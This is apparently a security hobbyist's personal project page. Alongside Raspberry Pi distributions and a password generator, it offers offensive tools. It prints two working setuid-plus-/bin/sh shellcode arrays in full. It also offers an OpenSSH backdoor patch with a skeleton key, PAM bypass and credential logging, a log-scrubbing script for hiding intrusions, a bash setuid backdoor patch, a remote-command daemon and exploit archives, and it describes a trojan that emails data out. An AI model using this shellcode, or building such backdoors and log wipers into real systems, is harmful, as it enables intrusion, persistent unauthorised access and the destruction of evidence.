.dtors [at] bob [dot] net
Recent Misc
PiBang Linux - A Linux distribution for the Raspberry Pi. It is inspired by Crunchbang Linux, and based on Raspbian.
PiBang Linux is committed to providing a highly configured Openbox desktop environment for the Raspberry Pi. We are also committed to contributing back to the Linux community and working to actively develop the software included in the distribution.
DB-Pi-1.0-Beta - Backtrack 5 for the Raspberry Pi? Close enough.

DB-Pi is a cut-down penetration [D]rop [B]ox distribution based on the recommended Raspbian image (hard-float). The toolsets included are a close enough match to those found on Backtrack 5 RC3. It is not recommended to run the Metasploit Framework on the Pi; it's just not powerful enough.
Add a battery pack (Pebble) and an automated script to the mix, and you could have a true drop box.
minecraft-pi-0.1.1-alpha.deb - a packaged version of Minecraft Pi edition as found on http://pi.minecraft.net. This package works specifically for PiBang Linux, of which I'm a contributor. A nice Crunchbang distribution tribute for the Raspberry Pi, see above.
ETR v1.0 - (Easy to Remember) is an online password generator based on the entropy engine zxcvbn, the same technology employed by Dropbox and GitHub. Unlike other password generators / checkers, this one does not penalise passwords without special characters.

'Through 20 years of effort, we've successfully trained everyone to use passwords that are hard for humans to remember, but easy for computers to guess.' - xkcd
Wargames set-loop.c - will find the highest UID to setuid(). Most services will run as non-root, so something generic was called for.
char shellcode[] =
        "\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
        "\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
        "\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
        "\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
Wargames Obfuscator is a bash script obfuscator. Obfuscation (or beclouding) is the hiding of intended meaning in communication, making communication confusing, wilfully ambiguous, and harder to interpret. Anyone with half a brain cell can reverse this obfuscation, but it was better than plaintext for its intended purpose.
Wargames OpenSSH-6.0p1.patch is a patch for the most recent version of OpenSSH (6.0 Portable as of writing). This patch adds a hardcoded skeleton key to the ssh daemon. A few bonuses include:
  • No connection traces in the log files
  • Usernames and passwords both in and out are logged
  • PAM bypass
  • Security through obscurity? Logging of usernames and passwords can be routed to /dev/null when deemed an invasion of privacy. Alternatively, use it to recover passwords of a compromised system.
Wargames BishII was one of the first multi-shellcode & multi-platform eggshell loaders back in its day. Ok, that day was over a decade ago, but this tool still has a place in today's vulnerability research.
Wargames Scrape is an automated grep machine for the common log files. Very basic automation script. It will remove a 'string' from the log files of most generic Linux systems. Removing duplicate/erroneous entries in log files has never been easier. A word of warning: if one were to scrape their own IP address, it is possible you could vanish from the internets altogether - use with caution.
Wargames Bash-4.2.patch is a patch to chmod a 'file' 4775 should a certain 'condition' exist. There are many scenarios where this could be useful, but its original intent was used long ago. The original patch I made was hugely outdated. This one is more current (4.2 as of writing).

Museum Section (+8 years old)
sunny-day.c - A purpose-built bug for frame pointer vulnerability exploration.

This is quite easy if you ask yourself the question, "What happens when you overwrite the least significant byte of a saved frame pointer?"

Tips:
  • main()'s stack frame will be shifted (if X > Y).
  • X is the original least significant byte.
  • Y is the overflow byte.

/exploits - Archive of my old exploits from 2000-2010
/shellcode - Archive of my shellcode from 2000-2010
SmS.c - Remotely execute commands on any server using SMS or email. This is a small daemon that monitors the mail queue for specific strings. If identified correctly, commands will be executed. This tool was once a very useful part of my toolkit, that is, before smartphones were invented. Old hat now :(
lnx-smart.tgz - will accept user input for setuid(). Most services will run as non-root, so something generic was called for.
char shellcode[] =
        "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x64\x3a\x20\x68\x73\x65"
        "\x74\x75\x89\xe1\xb2\x09\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x31"
        "\xd2\x89\xe1\xb2\x04\xb0\x03\xcd\x80\x89\xe6\x01\xc6\x4e\x89"
        "\xc1\x31\xdb\x31\xff\x47\x31\xc0\x80\xf9\x01\x72\x1a\x80\x3e"
        "\x0a\x74\x11\x80\x2e\x30\x8a\x06\xf7\xe7\x01\xc3\x31\xc0\xb0"
        "\x0a\xf7\xe7\x89\xc7\x4e\x49\xeb\xdf\x89\xd8\x89\xc3\x31\xc0"
        "\xb0\x46\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
        "\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b"
        "\xcd\x80\x31\xc0\x40\xcd\x80";

OLD! Bit Manipulation was a very short paper about the basics of encryption and bit manipulation, with a simple program at the end demonstrating the XOR algorithm.
OLD! Buffer Overflows for Kids Part I was a paper regarding the concept of buffer overflows and how to target this attack. Strangely popular and reformatted into multiple different languages.
OLD! Buffer Overflows for Kids Part II This was part II of the popular Bofs 4 Kids paper. Again, strangely popular and reformatted into multiple different languages.
OLD! Finding Vulnerabilities - An attempt to document one of many methods of finding vulnerabilities in source code. Some proof-of-concept code in there to scan source code for common programming mistakes.
OLD! Shellcoding - was a paper written on creating your own shellcode in assembly. Originally a 2-part paper, part II has now been appended to the end. Another popular paper back when mountains were pointy and trees were tall.
Ancient TrojanSpy:Linux/LSD.A - What began as a honeypot project ended up leaking onto the popular PacketStormSecurity website. Somehow this trojan is still in the wild 11 years later. HP-FTP has recently been used in case studies about trojan horses, see here: http://www.wcsit.org and a local copy here. PacketStormSecurity later changed the description of the trojan to reflect that, instead of being an exploit released by "The Last Stage of Delirium", it is a trojan: The hp-ftp trojan pretends to be an exploit created by the Last Stage of Delirium that targets HP-UX FTP servers. Upon execution this file will try to add two new accounts to the password file and will send an email with netstat information to aborted@yahoo.com and LinuxPir8@yahoo.com. - No one said it was pretty!
Ancient (1990's) Simple Batch File Viruses Explained - This paper was my very first attempt at writing anything technical and releasing it onto the internet. I found this paper released on vx.netlux.org, but later this year the site was taken down by federal police due to the content that was being hosted. Cringe-worthy reading at its best.